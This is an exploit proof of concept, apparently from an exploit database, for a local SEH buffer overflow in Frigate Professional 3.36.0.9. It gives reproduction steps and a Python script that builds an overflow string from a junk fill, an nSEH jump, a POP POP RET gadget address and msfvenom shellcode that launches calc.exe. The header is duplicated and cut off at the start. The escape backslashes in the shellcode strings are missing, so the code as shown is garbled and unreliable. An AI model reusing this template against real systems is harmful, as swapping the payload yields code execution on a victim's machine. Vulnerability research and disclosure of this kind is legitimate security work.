# Exploit Title: Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)
# Vendor Homepage: http://www.frigate3.com/
# Software Link Download: http://www. # Exploit Title: Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)
# Vendor Homepage: http://www.frigate3.com/
# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-04
# Vulnerable Software: Frigate Professional
# Version: 3.36.0.9
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

#Steps to Produce the Crash:

# 1.- Run python code: FrigateLCE.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for Frigate3.exe
# 4.- Open "Frigate3.exe"
# 5.- Go to "Disk" > Find Computer
# 6.- Paste ClipBoard into the "Computer Name:" field
# 7.- Click on OK
# 8.- Calc.exe runs


#################################################################################################################################################

#Python "FrigateLCE.py" Code:

f= open("FrigateLCE.txt", "w")

junk="A" * 4112

nseh="xebx20x90x90"

seh="x4Bx0Cx01x40"

#40010C4B 5B POP EBX
#40010C4C 5D POP EBP
#40010C4D C3 RETN
#POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:Program FilesFrigate3 tl60.bpl)

nops="x90" * 50

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "x00x14x09x0ax0d" -f python

buf = ""
buf += "xbfxe3xfax7bx97xdbxd5xd9x74x24xf4x5dx2b"
buf += "xc9xb1x30x83xedxfcx31x7dx0fx03x7dxecx18"
buf += "x8ex6bx1ax5ex71x94xdax3fxfbx71xebx7fx9f"
buf += "xf2x5bxb0xebx57x57x3bxb9x43xecx49x16x63"
buf += "x45xe7x40x4ax56x54xb0xcdxd4xa7xe5x2dxe5"
buf += "x67xf8x2cx22x95xf1x7dxfbxd1xa4x91x88xac"
buf += "x74x19xc2x21xfdxfex92x40x2cx51xa9x1axee"
buf += "x53x7ex17xa7x4bx63x12x71xe7x57xe8x80x21"
buf += "xa6x11x2ex0cx07xe0x2ex48xafx1bx45xa0xcc"
buf += "xa6x5ex77xafx7cxeax6cx17xf6x4cx49xa6xdb"
buf += "x0bx1axa4x90x58x44xa8x27x8cxfexd4xacx33"
buf += "xd1x5dxf6x17xf5x06xacx36xacxe2x03x46xae"
buf += "x4dxfbxe2xa4x63xe8x9exe6xe9xefx2dx9dx5f"
buf += "xefx2dx9excfx98x1cx15x80xdfxa0xfcxe5x10"
buf += "xebx5dx4fxb9xb2x37xd2xa4x44xe2x10xd1xc6"
buf += "x07xe8x26xd6x6dxedx63x50x9dx9fxfcx35xa1"
buf += "x0cxfcx1fxc2xd3x6exc3x05"


payload = junk + nseh + seh + nops + buf

f.write(payload)
f.close